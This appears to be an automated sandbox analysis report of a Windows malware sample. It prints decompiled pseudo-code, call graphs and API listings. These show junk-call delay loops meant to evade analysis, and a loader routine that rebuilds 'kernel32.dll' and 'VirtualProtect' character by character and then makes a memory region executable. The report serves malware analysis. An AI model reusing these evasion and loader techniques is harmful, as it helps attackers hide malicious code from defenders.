40512f 10102->10105 10106 405139 10105->10106 10107 405142 10106->10107 10108 4069ed 6 API calls 10106->10108 10109 4069ed 6 API calls 10107->10109 10110 40516c 10107->10110 10108->10107 10109->10110 10110->9311 10125 4056db 10111->10125 10114 4056db 6 API calls 10115 405f40 10114->10115 10128 405357 10115->10128 10120 405de5 68 API calls 10121 405f6e 10120->10121 10121->9326 10123 405ffd 76 API calls 10122->10123 10124 40629b 10123->10124 10124->9330 10126 4056c5 6 API calls 10125->10126 10127 4056e9 10126->10127 10127->10114 10135 405177 10128->10135 10131 405bd6 10132 405bf0 std::_String_base::_Xlen 10131->10132 10139 405afa 10132->10139 10136 405180 10135->10136 10137 4069ed 6 API calls 10136->10137 10138 405199 10136->10138 10137->10138 10138->10121 10138->10131 10140 405b1c 10139->10140 10143 4058c1 10140->10143 10144 4058ca 10143->10144 10145 4058df 10144->10145 10146 4058b7 76 API calls 10144->10146 10145->10120 10146->10144 10148 40ac06 10147->10148 10151 40a956 10148->10151 10152 407de5 _LocaleUpdate::_LocaleUpdate 78 API calls 10151->10152 10156 40a96b 10152->10156 10153 40a97d 10154 407a37 strtoxl 68 API calls 10153->10154 10157 40a982 10154->10157 10155 40a9bb 10162 40aa01 strtoxq __aulldvrm 10155->10162 10163 41055f 10155->10163 10156->10153 10156->10155 10158 4069c7 strtoxl 6 API calls 10157->10158 10161 404ffe 10158->10161 10160 407a37 strtoxl 68 API calls 10160->10161 10161->9342 10162->10160 10162->10161 10164 407de5 _LocaleUpdate::_LocaleUpdate 78 API calls 10163->10164 10165 410573 10164->10165 10166 410e72 __isleadbyte_l 78 API calls 10165->10166 10169 410580 10165->10169 10167 4105a8 10166->10167 10170 411a17 10167->10170 10169->10155 10171 407de5 _LocaleUpdate::_LocaleUpdate 78 API calls 10170->10171 10172 411a2a 10171->10172 10175 41185d 10172->10175 10176 4118a9 10175->10176 10177 41187e GetStringTypeW 10175->10177 10178 411896 10176->10178 10180 411990 10176->10180 10177->10178 10179 41189e GetLastError 10177->10179 10181 4118e2 MultiByteToWideChar 10178->10181 10198 41198a 10178->10198 10179->10176 10203 415238 GetLocaleInfoA 10180->10203 10188 41190f 10181->10188 10181->10198 10183 40730b __except_handler4 5 API calls 10185 411a15 10183->10185 10185->10169 10186 4119e1 GetStringTypeA 10191 4119fc 10186->10191 10186->10198 10187 411924 _memset ___convertcp 10190 41195d MultiByteToWideChar 10187->10190 10187->10198 10188->10187 10192 40743a _malloc 68 API calls 10188->10192 10193 411973 GetStringTypeW 10190->10193 10194 411984 10190->10194 10195 406f3b ___free_lconv_num 68 API calls 10191->10195 10192->10187 10193->10194 10199 411453 10194->10199 10195->10198 10198->10183 10200 411470 10199->10200 10201 41145f 10199->10201 10200->10198 10201->10200 10202 406f3b ___free_lconv_num 68 API calls 10201->10202 10202->10200 10204 415266 10203->10204 10205 41526b 10203->10205 10207 40730b __except_handler4 5 API calls 10204->10207 10234 406ecf 10205->10234 10208 4119b4 10207->10208 10208->10186 10208->10198 10209 415281 10208->10209 10210 4152c1 GetCPInfo 10209->10210 10214 41534b 10209->10214 10211 415336 MultiByteToWideChar 10210->10211 10212 4152d8 10210->10212 10211->10214 10218 4152f1 _strlen 10211->10218 10212->10211 10215 4152de GetCPInfo 10212->10215 10213 40730b __except_handler4 5 API calls 10216 4119d5 10213->10216 10214->10213 10215->10211 10217 4152eb 10215->10217 10216->10186 10216->10198 10217->10211 10217->10218 10219 415323 _memset ___convertcp 10218->10219 10220 40743a _malloc 68 API calls 10218->10220 10219->10214 10221 415380 MultiByteToWideChar 10219->10221 10220->10219 10222 4153b7 10221->10222 10223 415398 10221->10223 10224 411453 __freea 68 API calls 10222->10224 10225 4153bc 10223->10225 10226 41539f WideCharToMultiByte 10223->10226 10224->10214 10227 4153c7 WideCharToMultiByte 10225->10227 10228 4153db 10225->10228 10226->10222 10227->10222 10227->10228 10229 4101bf __calloc_crt 68 API calls 10228->10229 10230 4153e3 10229->10230 10230->10222 10231 4153ec WideCharToMultiByte 10230->10231 10231->10222 10232 4153fe 10231->10232 10233 406f3b ___free_lconv_num 68 API calls 10232->10233 10233->10222 10237 40a92b 10234->10237 10238 40a944 10237->10238 10239 40a6fc strtoxl 92 API calls 10238->10239 10240 406ee0 10239->10240 10240->10204 10242 405ec4 10241->10242 10244 405ece std::_String_base::_Xlen 10241->10244 10243 405de5 68 API calls 10242->10243 10243->10244 10244->9344 10246 40cc5f ___BuildCatchObjectHelper 10245->10246 10247 40aee2 __lock 68 API calls 10246->10247 10248 40cc66 10247->10248 10249 40cd1f __initterm 10248->10249 10251 4092c6 __decode_pointer 6 API calls 10248->10251 10262 40cd6a 10249->10262 10253 40cc9d 10251->10253 10253->10249 10256 4092c6 __decode_pointer 6 API calls 10253->10256 10254 40cd67 ___BuildCatchObjectHelper 10254->8728 10260 40ccb2 10256->10260 10257 40cd5e 10258 40cb63 _doexit 3 API calls 10257->10258 10258->10254 10259 4092bd 7 API calls _doexit 10259->10260 10260->10249 10260->10259 10261 4092c6 6 API calls __decode_pointer 10260->10261 10261->10260 10263 40cd70 10262->10263 10264 40cd4b 10262->10264 10267 40ae08 LeaveCriticalSection 10263->10267 10264->10254 10266 40ae08 LeaveCriticalSection 10264->10266 10266->10257 10267->10264 10268 4092bd 10269 40924b __encode_pointer 7 API calls 10268->10269 10270 4092c4 10269->10270

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 404bb9-404bc3 1 404bc5-404bcb 0->1 2 404bdc-404be2 1->2 3 404bcd-404bd6 GetComboBoxInfo SetLastError 1->3 4 404be4-404bec 2->4 5 404bf8-404bff 2->5 3->2 4->5 6 404bee-404bf6 4->6 5->1 7 404c01 5->7 6->5 6->7 8 404c03-404c09 7->8 9 404c16-404c1d 8->9 10 404c0b-404c10 8->10 9->8 11 404c1f-404c2c call 404ba5 9->11 10->9 14 404c31-404c3b 11->14 15 404c4c-404c56 14->15 16 404c3d-404c46 FindNextFileW 14->16 17 404ca8-404ca9 15->17 18 404c58-404ca2 EnumCalendarInfoW VerifyVersionInfoA EnumTimeFormatsA InterlockedDecrement GetLongPathNameW WaitForSingleObject QueryMemoryResourceNotification 15->18 16->15 17->14 19 404cab-404cb2 17->19 18->17 20 404cb4-404cb9 19->20 21 404cfe-404d03 19->21 24 404cd2-404cdf call 4045df 20->24 25 404cbb-404ccc GetUserDefaultLangID WritePrivateProfileStringA AddRefActCtx 20->25 22 404db1-404db9 21->22 23 404d09-404dab DeleteVolumeMountPointA CreateActCtxA EnumTimeFormatsA _hwrite SetHandleInformation EnumResourceLanguagesA CreateNamedPipeA GetCurrentProcessId GetComputerNameA GetLocaleInfoW HeapAlloc GetModuleHandleW SetVolumeMountPointW call 403ca0 FindResourceW DeleteVolumeMountPointA GetConsoleAliasesLengthA 21->23 27 404dbe-404dc4 22->27 23->22 34 404ce1-404cee MoveFileWithProgressA 24->34 35 404cf4-404cfc 24->35 25->24 30 404dc6-404dc9 LoadLibraryA 27->30 31 404dce-404dd5 27->31 30->31 31->27 33 404dd7-404ddd 31->33 36 404ddf-404de5 33->36 34->35 35->20 35->21 37 404de7 call 4046f6 36->37 38 404dec-404df3 36->38 37->38 38->36 40 404df5-404e0b call 4045b7 38->40 43 404e0d-404e1a GlobalFlags 40->43 44 404e21-404e28 43->44 45 404e1c call 4046e7 43->45 44->43 47 404e2a 44->47 45->44 48 404e2f-404e36 47->48 49 404e72-404e73 48->49 50 404e38-404e6c WritePrivateProfileSectionA GetConsoleAliasW SetConsoleCursorInfo GetProfileSectionA 48->50 49->48 51 404e75-404ed1 LoadLibraryA 49->51 50->49 52 404ed2-404ed9 GetLastError 51->52 52->52 53 404edb-404ee5 52->53 54 404ee7-404f52 EndUpdateResourceA GetModuleHandleW FreeConsole FindResourceW SearchPathA GetConsoleTitleA OpenMutexW GetUserDefaultLangID InterlockedExchange GetBinaryTypeW GetCommandLineW 53->54 55 404f58-404f67 call 4046e0 53->55 54->55
                C-Code - Quality: 77%
                			E00404BB9(void* __edx) {
                				char _v2048;
                				char _v2056;
                				short _v2064;
                				char _v3072;
                				char _v3088;
                				struct _OSVERSIONINFOEXA _v3232;
                				intOrPtr _v3256;
                				char _v3272;
                				CHAR* _v3276;
                				long _v3280;
                				struct _CONSOLE_CURSOR_INFO _v3292;
                				char _v3296;
                				char _v3304;
                				intOrPtr _t34;
                				void* _t88;
                				WCHAR* _t94;
                				void* _t95;
                				void* _t96;
                				void* _t97;
                				void* _t98;
                				void* _t99;
                				void* _t100;
                				intOrPtr* _t101;
                				CHAR* _t103;
                
                				_t94 = 0;
                				L1:
                				L1:
                				if(_t94 < 0x1ef75) {
                					GetComboBoxInfo(0, 0);
                					SetLastError(0);
                				}
                				if(_t94 <= 0x1ea055ff || _v3280 == 0xacef98 || _v3256 == 0xad6910c) {
                					goto L6;
                				}
                				L7:
                				_t88 = 0;
                				do {
                					if(_t88 == 0x13e6) {
                						 *0x557154 =  *0x557154 + 0x38d6;
                					}
                					_t88 = _t88 + 1;
                				} while (_t88 < 0x31a652);
                				E00404BA5();
                				_t95 = 0x962a52;
                				do {
                					if( *0x557154 == 0x139) {
                						FindNextFileW(0,  &_v3072);
                					}
                					if( *0x557154 == 0x71f) {
                						EnumCalendarInfoW(0, 0, 0, 0);
                						VerifyVersionInfoA( &_v3232, 0, 0);
                						EnumTimeFormatsA(0, 0, 0);
                						InterlockedDecrement( &(_v3292.bVisible));
                						__imp__GetLongPathNameW(L"jotexavehuhuyezorozilabuloboxelaheyonuzepisaxabahoxayeponepe",  &_v2056, 0, 0);
                						WaitForSingleObject(0, 0);
                						__imp__QueryMemoryResourceNotification(0,  &_v3296);
                					}
                					_t95 = _t95 - 1;
                				} while (_t95 != 0);
                				_t34 =  *0x557154; // 0x11b88
                				if(_t34 > 0) {
                					do {
                						if(_t34 == 0xfe) {
                							GetUserDefaultLangID();
                							WritePrivateProfileStringA(0, 0, 0, 0);
                							__imp__AddRefActCtx(0);
                						}
                						E004045DF(_t95);
                						if( *0x557154 == 0x29) {
                							__imp__MoveFileWithProgressA("berimilipuhonovoci", "zatojoranidohogeroxadarur hamoc tukona ceyutinaxakaxibagucilawer bezelotuyariyaluciyorep", 0, 0, 0);
                						}
                						_t34 =  *0x557154; // 0x11b88
                						_t95 = _t95 + 1;
                					} while (_t95 < _t34);
                				}
                				_t123 = _t34 - 0x19c;
                				if(_t34 == 0x19c) {
                					_t101 = __imp__DeleteVolumeMountPointA;
                					 *_t101(0);
                					__imp__CreateActCtxA( &_v3272);
                					EnumTimeFormatsA(0, 0, 0);
                					_hwrite(0, "cesojonuravepagiwamiru fuhuboh xozopogiyagu vah sogevozapuyulov", 0);
                					SetHandleInformation(0, 0, 0);
                					EnumResourceLanguagesA(0, 0, 0, 0, 0);
                					CreateNamedPipeA(0, 0, 0, 0, 0, 0, 0, 0);
                					GetCurrentProcessId();
                					GetComputerNameA( &_v3088,  &_v3292);
                					GetLocaleInfoW(0, 0,  &_v2064, 0);
                					HeapAlloc(0, 0, 0);
                					GetModuleHandleW(0);
                					__imp__SetVolumeMountPointW(0, 0);
                					E00403CA0(_t123,  &_v3304, 0);
                					FindResourceW(0, 0, 0);
                					 *_t101(0);
                					__imp__GetConsoleAliasesLengthA(0);
                				}
                				_t96 = 0;
                				_t103 = "msimg32.dll";
                				do {
                					if(_t96 == 0xab9d) {
                						 *0x557150 = LoadLibraryA(_t103);
                					}
                					_t96 = _t96 + 1;
                				} while (_t96 < 0x2594b);
                				"msimg32.dll" = 0;
                				_t97 = 0;
                				do {
                					if(_t97 == 0x148) {
                						E004046F6();
                					}
                					_t97 = _t97 + 1;
                				} while (_t97 < 0x71761d);
                				E004045B7( *0x5565f8,  *0x557154, 0x41a010);
                				_t98 = 0;
                				do {
                					GlobalFlags(0); // executed
                					if(_t98 == 0x30f4) {
                						E004046E7();
                					}
                					_t98 = _t98 + 1;
                				} while (_t98 < 0x48122);
                				_t99 = 0xdd7b3;
                				do {
                					if( *0x557154 == 0x21) {
                						WritePrivateProfileSectionA(0, 0, 0);
                						__imp__GetConsoleAliasW(0,  &_v2048, 0, 0);
                						SetConsoleCursorInfo(0,  &_v3292);
                						GetProfileSectionA("kinalanar",  &_v3088, 0);
                					}
                					_t99 = _t99 - 1;
                				} while (_t99 != 0);
                				M0042D4A9 = 0x73;
                				"mg32.dll" = 0x6d;
                				M0042D4AC = 0x67;
                				M0042D4AA = 0x69;
                				 *0x42d4b2 = 0x6c;
                				 *0x42d4ae = 0x32;
                				 *0x42d4b1 = 0x6c;
                				 *0x42d4b3 = 0;
                				"32.dll" = 0x33;
                				 *0x42d4b0 = 0x64;
                				"msimg32.dll" = 0x6d;
                				 *0x42d4af = 0x2e; // executed
                				LoadLibraryA(_t103); // executed
                				_t100 = 0x1ef75;
                				do {
                					GetLastError();
                					_t100 = _t100 - 1;
                				} while (_t100 != 0);
                				if( *0x557154 == 0x58c) {
                					EndUpdateResourceA(0, 0);
                					GetModuleHandleW(L"befiray");
                					FreeConsole();
                					FindResourceW(0, 0, 0);
                					SearchPathA(0, 0, 0, 0,  &_v3072,  &_v3276);
                					GetConsoleTitleA( &_v2048, 0);
                					OpenMutexW(0, 0, 0);
                					GetUserDefaultLangID();
                					InterlockedExchange(0, 0);
                					GetBinaryTypeW(0,  &_v3280);
                					GetCommandLineW();
                				}
                				E004046E0();
                				return 0;
                				L6:
                				_t94 = _t94 + 1;
                				if(_t94 < 0x8deecc68) {
                					goto L1;
                				}
                				goto L7;
                			}



























                0x00404bc3
                0x00000000
                0x00404bc5
                0x00404bcb
                0x00404bcf
                0x00404bd6
                0x00404bd6
                0x00404be2
                0x00000000
                0x00000000
                0x00404c01
                0x00404c01
                0x00404c03
                0x00404c09
                0x00404c10
                0x00404c10
                0x00404c16
                0x00404c17
                0x00404c21
                0x00404c2c
                0x00404c31
                0x00404c3b
                0x00404c46
                0x00404c46
                0x00404c56
                0x00404c5c
                0x00404c6a
                0x00404c73
                0x00404c7a
                0x00404c8e
                0x00404c96
                0x00404ca2
                0x00404ca2
                0x00404ca8
                0x00404ca8
                0x00404cab
                0x00404cb2
                0x00404cb4
                0x00404cb9
                0x00404cbb
                0x00404cc5
                0x00404ccc
                0x00404ccc
                0x00404cd3
                0x00404cdf
                0x00404cee
                0x00404cee
                0x00404cf4
                0x00404cf9
                0x00404cfa
                0x00404cb4
                0x00404cfe
                0x00404d03
                0x00404d09
                0x00404d10
                0x00404d17
                0x00404d20
                0x00404d29
                0x00404d32
                0x00404d3d
                0x00404d4b
                0x00404d51
                0x00404d64
                0x00404d75
                0x00404d7e
                0x00404d85
                0x00404d8d
                0x00404d99
                0x00404da1
                0x00404da8
                0x00404dab
                0x00404dab
                0x00404db7
                0x00404db9
                0x00404dbe
                0x00404dc4
                0x00404dc9
                0x00404dc9
                0x00404dce
                0x00404dcf
                0x00404dd7
                0x00404ddd
                0x00404ddf
                0x00404de5
                0x00404de7
                0x00404de7
                0x00404dec
                0x00404ded
                0x00404e06
                0x00404e0b
                0x00404e0d
                0x00404e0e
                0x00404e1a
                0x00404e1c
                0x00404e1c
                0x00404e21
                0x00404e22
                0x00404e2a
                0x00404e2f
                0x00404e36
                0x00404e3b
                0x00404e4c
                0x00404e58
                0x00404e6c
                0x00404e6c
                0x00404e72
                0x00404e72
                0x00404e76
                0x00404e7d
                0x00404e84
                0x00404e8b
                0x00404e92
                0x00404e99
                0x00404ea0
                0x00404ea7
                0x00404ead
                0x00404eb4
                0x00404ebb
                0x00404ec2
                0x00404ec9
                0x00404ecc
                0x00404ed2
                0x00404ed2
                0x00404ed8
                0x00404ed8
                0x00404ee5
                0x00404ee9
                0x00404ef4
                0x00404efa
                0x00404f03
                0x00404f1a
                0x00404f29
                0x00404f32
                0x00404f38
                0x00404f40
                0x00404f4c
                0x00404f52
                0x00404f52
                0x00404f58
                0x00404f67
                0x00404bf8
                0x00404bf8
                0x00404bff
                0x00000000
                0x00000000
                0x00000000

                APIs
                • GetComboBoxInfo.USER32(00000000,00000000,00000000), ref: 00404BCF
                • SetLastError.KERNEL32(00000000), ref: 00404BD6
                • FindNextFileW.KERNEL32(00000000,?,0079A862,?,00000000), ref: 00404C46
                • EnumCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000,0079A862,?,00000000), ref: 00404C5C
                • VerifyVersionInfoA.KERNEL32(?,00000000,00000000,00000000), ref: 00404C6A
                • EnumTimeFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00404C73
                • InterlockedDecrement.KERNEL32(?), ref: 00404C7A
                • GetLongPathNameW.KERNEL32(jotexavehuhuyezorozilabuloboxelaheyonuzepisaxabahoxayeponepe,?,00000000), ref: 00404C8E
                • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 00404C96
                • QueryMemoryResourceNotification.KERNEL32(00000000,?,?,00000000), ref: 00404CA2
                • GetUserDefaultLangID.KERNEL32(0079A862,?,00000000), ref: 00404CBB
                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404CC5
                • AddRefActCtx.KERNEL32(00000000,?,00000000), ref: 00404CCC
                • MoveFileWithProgressA.KERNEL32 ref: 00404CEE
                • DeleteVolumeMountPointA.KERNEL32 ref: 00404D10
                • CreateActCtxA.KERNEL32 ref: 00404D17
                • EnumTimeFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00404D20
                • _hwrite.KERNEL32(00000000,cesojonuravepagiwamiru fuhuboh xozopogiyagu vah sogevozapuyulov,00000000), ref: 00404D29
                • SetHandleInformation.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404D32
                • EnumResourceLanguagesA.KERNEL32 ref: 00404D3D
                • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404D4B
                • GetCurrentProcessId.KERNEL32(?,00000000), ref: 00404D51
                • GetComputerNameA.KERNEL32 ref: 00404D64
                • GetLocaleInfoW.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 00404D75
                • HeapAlloc.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404D7E
                • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00404D85
                • SetVolumeMountPointW.KERNEL32(00000000,00000000), ref: 00404D8D
                • FindResourceW.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000), ref: 00404DA1
                • DeleteVolumeMountPointA.KERNEL32 ref: 00404DA8
                • GetConsoleAliasesLengthA.KERNEL32(00000000,?,00000000), ref: 00404DAB
                • LoadLibraryA.KERNEL32(msimg32.dll,0079A862,?,00000000), ref: 00404DC7
                • GlobalFlags.KERNEL32(00000000), ref: 00404E0E
                • WritePrivateProfileSectionA.KERNEL32(00000000,00000000,00000000), ref: 00404E3B
                • GetConsoleAliasW.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 00404E4C
                • SetConsoleCursorInfo.KERNEL32(00000000,?,?,00000000), ref: 00404E58
                • GetProfileSectionA.KERNEL32(kinalanar,?,00000000), ref: 00404E6C
                • LoadLibraryA.KERNELBASE(msimg32.dll,?,00000000), ref: 00404EC9
                • GetLastError.KERNEL32 ref: 00404ED2
                • EndUpdateResourceA.KERNEL32 ref: 00404EE9
                • GetModuleHandleW.KERNEL32(befiray), ref: 00404EF4
                • FreeConsole.KERNEL32 ref: 00404EFA
                • FindResourceW.KERNEL32(00000000,00000000,00000000), ref: 00404F03
                • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00404F1A
                • GetConsoleTitleA.KERNEL32(?,00000000), ref: 00404F29
                • OpenMutexW.KERNEL32(00000000,00000000,00000000), ref: 00404F32
                • GetUserDefaultLangID.KERNEL32 ref: 00404F38
                • InterlockedExchange.KERNEL32(00000000,00000000), ref: 00404F40
                • GetBinaryTypeW.KERNEL32(00000000,?), ref: 00404F4C
                • GetCommandLineW.KERNEL32 ref: 00404F52
                Strings
                • msimg32.dll, xrefs: 00404DB9, 00404DC6, 00404DD7, 00404E75
                • cesojonuravepagiwamiru fuhuboh xozopogiyagu vah sogevozapuyulov, xrefs: 00404D23
                • kinalanar, xrefs: 00404E67
                • befiray, xrefs: 00404EEF
                • berimilipuhonovoci, xrefs: 00404CE9
                • jotexavehuhuyezorozilabuloboxelaheyonuzepisaxabahoxayeponepe, xrefs: 00404C89
                • zatojoranidohogeroxadarur hamoc tukona ceyutinaxakaxibagucilawer bezelotuyariyaluciyorep, xrefs: 00404CE4
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: ConsoleInfoResource$Enum$FindHandleMountPointProfileVolume$CreateDefaultDeleteErrorFileFormatsInterlockedLangLastLibraryLoadModuleNamePathPrivateSectionTimeUserWrite$AliasAliasesAllocBinaryCalendarComboCommandComputerCurrentCursorDecrementExchangeFlagsFreeGlobalHeapInformationLanguagesLengthLineLocaleLongMemoryMoveMutexNamedNextNotificationObjectOpenPipeProcessProgressQuerySearchSingleStringTitleTypeUpdateVerifyVersionWaitWith_hwrite
                • String ID: befiray$berimilipuhonovoci$cesojonuravepagiwamiru fuhuboh xozopogiyagu vah sogevozapuyulov$jotexavehuhuyezorozilabuloboxelaheyonuzepisaxabahoxayeponepe$kinalanar$msimg32.dll$zatojoranidohogeroxadarur hamoc tukona ceyutinaxakaxibagucilawer bezelotuyariyaluciyorep
                • API String ID: 667134268-3466078028
                • Opcode ID: ce696f204f75d701fc62a729d79aa2a8789e8607b65b4eb49400fa8afa3fd516
                • Instruction ID: e34e32465fad60da0cc5aa76c82a97f206e2cfed7bea4b7a2ee7bdb58a49d0d5
                • Opcode Fuzzy Hash: ce696f204f75d701fc62a729d79aa2a8789e8607b65b4eb49400fa8afa3fd516
                • Instruction Fuzzy Hash: 3A9144F1804288AFE7116BB4EEC8EAB77ACEB54345F004436F686B2571D63C5C858B79
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 58 4046f6-404ba4 LoadLibraryA GetProcAddress VirtualProtect
                C-Code - Quality: 100%
                			E004046F6() {
                				intOrPtr _v4;
                				intOrPtr _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				intOrPtr _v44;
                				intOrPtr _v48;
                				intOrPtr _v52;
                				intOrPtr _v56;
                				intOrPtr _v60;
                				intOrPtr _v64;
                				intOrPtr _v68;
                				intOrPtr _v72;
                				intOrPtr _v76;
                				intOrPtr _v80;
                				intOrPtr _v84;
                				intOrPtr _v88;
                				intOrPtr _v92;
                				intOrPtr _v96;
                				intOrPtr _v100;
                				intOrPtr _v104;
                				intOrPtr _v108;
                				intOrPtr _v112;
                				intOrPtr _v116;
                				intOrPtr _v120;
                				intOrPtr _v124;
                				intOrPtr _v128;
                				long _v132;
                				int _t364;
                				CHAR* _t390;
                
                				_t390 = "msimg32.dll";
                				 *0x42d4ae = 0x33;
                				 *0x42d4af = 0x32;
                				 *0x42d4b3 = 0x6c;
                				 *0x42d4b2 = 0x6c;
                				"mg32.dll" = 0x6e;
                				"32.dll" = 0x6c;
                				"msimg32.dll" = 0x6b;
                				M0042D4AC = 0x65;
                				M0042D4AA = 0x72;
                				 *0x42d4b0 = 0x2e;
                				 *0x42d4b1 = 0x64;
                				M0042D4A9 = 0x65;
                				 *0x42d4b4 = 0;
                				 *0x557150 = LoadLibraryA(_t390);
                				_v72 = 0x368418b0;
                				_v40 = 0x61a1c405;
                				_v96 = 0xc095e74;
                				_v92 = 0x78f2afd3;
                				_v32 = 0x55578391;
                				_v120 = 0x26209a8a;
                				_v80 = 0x38e0c823;
                				_v100 = 0x605fdad6;
                				_v108 = 0x5bedd06e;
                				_v12 = 0x3d0c83c9;
                				_v16 = 0x701f6b66;
                				_v104 = 0x1ab29123;
                				_v4 = 0x39d6e811;
                				_v76 = 0x7476a3f3;
                				_v56 = 0x188989be;
                				_v124 = 0x3dcede25;
                				_v116 = 0x25b0a5a6;
                				_v44 = 0x3e1d73b5;
                				_v20 = 0x5dc103a9;
                				_v112 = 0x748a784f;
                				_v52 = 0x1c882e17;
                				_v28 = 0x406ee06d;
                				_v36 = 0x792cf4fa;
                				_v24 = 0x1681d686;
                				_v128 = 0x7f744a26;
                				_v88 = 0x108aa678;
                				_v60 = 0x2e8d3777;
                				_v64 = 0x41178626;
                				_v48 = 0x14922f4a;
                				_v84 = 0x7cab3473;
                				_v68 = 0x6cac10f2;
                				_v8 = 0x51eed42d;
                				_v72 = _v72 + 0x69dacef5;
                				_v96 = _v96 + 0x2760e5e8;
                				_v72 = _v72 - 0x768b5f15;
                				_v96 = _v96 - 0x3bc9a4f0;
                				_v92 = _v92 - 0x72691ce;
                				_v96 = _v96 - 0x644e11b3;
                				_v32 = _v32 - 0x3df40d01;
                				_v40 = _v40 - 0x7967fa1d;
                				_v40 = _v40 + 0x3be9f591;
                				_v80 = _v80 - 0x1121ea27;
                				_v96 = _v96 - 0x7cbb076b;
                				_v96 = _v96 + 0x206fed4a;
                				_v80 = _v80 - 0x549eff17;
                				_v12 = _v12 - 0x2562e24a;
                				_v104 = _v104 - 0x75df3b9c;
                				_v80 = _v80 - 0x599aac00;
                				_v96 = _v96 - 0x6eafd6b5;
                				_v32 = _v32 + 0x652fee1b;
                				_v96 = _v96 + 0x378e6798;
                				_v32 = _v32 - 0x47a46c3c;
                				_v32 = _v32 - 0x298f1a4d;
                				_v40 = _v40 - 0x133da9a;
                				_v16 = _v16 - 0x613763c9;
                				_v56 = _v56 + 0xefa2a6e;
                				_v96 = _v96 + 0x693d074f;
                				_v116 = _v116 + 0x51836527;
                				_v80 = _v80 - 0x224dfef1;
                				_v4 = _v4 - 0x20dfe821;
                				_v20 = _v20 - 0x3926fb15;
                				_v108 = _v108 + 0x754a3cb6;
                				_v96 = _v96 + 0x14ca3371;
                				_v120 = _v120 - 0x53af86fd;
                				_v104 = _v104 + 0x1062ce7e;
                				_v80 = _v80 + 0x16bc329e;
                				_v76 = _v76 + 0x36b97358;
                				_v76 = _v76 - 0x58b9c9d1;
                				_v4 = _v4 + 0x53ef8e84;
                				_v124 = _v124 + 0x2b21d1b4;
                				_v108 = _v108 + 0x4a47916a;
                				_v76 = _v76 - 0x7e41ff47;
                				_v72 = _v72 - 0x20152b96;
                				_v64 = _v64 - 0x2eadfab7;
                				_v52 = _v52 - 0x5608305c;
                				_v104 = _v104 + 0x47182c2f;
                				 *0x42d4b3 = 0x65;
                				M0042D4A9 = 0x69;
                				M0042D4AC = 0x75;
                				 *0x42d4ae = 0x6c;
                				"32.dll" = 0x61;
                				 *0x42d4b1 = 0x6f;
                				 *0x42d4b5 = 0x74;
                				"msimg32.dll" = 0x56;
                				 *0x42d4b4 = 0x63;
                				 *0x42d4af = 0x50;
                				 *0x42d4b6 = 0;
                				"mg32.dll" = 0x74;
                				 *0x42d4b2 = 0x74;
                				M0042D4AA = 0x72;
                				 *0x42d4b0 = 0x72;
                				"`g)wmsimg32.dll" = GetProcAddress( *0x557150, _t390);
                				_t364 = VirtualProtect( *0x5565f8,  *0x557154, 0x40,  &_v132); // executed
                				return _t364;
                			}






































                0x004046fd
                0x00404703
                0x0040470a
                0x00404711
                0x00404718
                0x0040471f
                0x00404726
                0x0040472d
                0x00404734
                0x0040473b
                0x00404742
                0x00404749
                0x00404750
                0x00404757
                0x00404764
                0x00404769
                0x00404771
                0x00404779
                0x00404781
                0x00404789
                0x00404791
                0x00404799
                0x004047a1
                0x004047a9
                0x004047b1
                0x004047b9
                0x004047c1
                0x004047c9
                0x004047d4
                0x004047dc
                0x004047e4
                0x004047ec
                0x004047f4
                0x004047fc
                0x00404804
                0x0040480c
                0x00404814
                0x0040481c
                0x00404824
                0x0040482c
                0x00404834
                0x0040483c
                0x00404844
                0x0040484c
                0x00404854
                0x0040485c
                0x00404864
                0x00404889
                0x00404891
                0x00404899
                0x004048a1
                0x004048b6
                0x004048be
                0x004048c6
                0x004048e8
                0x004048fd
                0x00404912
                0x0040491a
                0x00404922
                0x0040492a
                0x0040493f
                0x00404947
                0x0040494f
                0x00404964
                0x0040496c
                0x00404981
                0x00404996
                0x0040499e
                0x004049a6
                0x004049bb
                0x004049c3
                0x004049cb
                0x004049d3
                0x00404a02
                0x00404a0a
                0x00404a22
                0x00404a2a
                0x00404a3f
                0x00404a47
                0x00404a4f
                0x00404a57
                0x00404a6c
                0x00404a74
                0x00404a7c
                0x00404a87
                0x00404a8f
                0x00404a97
                0x00404ad3
                0x00404ae8
                0x00404af0
                0x00404af8
                0x00404b14
                0x00404b1b
                0x00404b22
                0x00404b29
                0x00404b30
                0x00404b37
                0x00404b3e
                0x00404b45
                0x00404b4c
                0x00404b53
                0x00404b5a
                0x00404b61
                0x00404b68
                0x00404b6f
                0x00404b76
                0x00404b90
                0x00404b9b
                0x00404ba4

                APIs
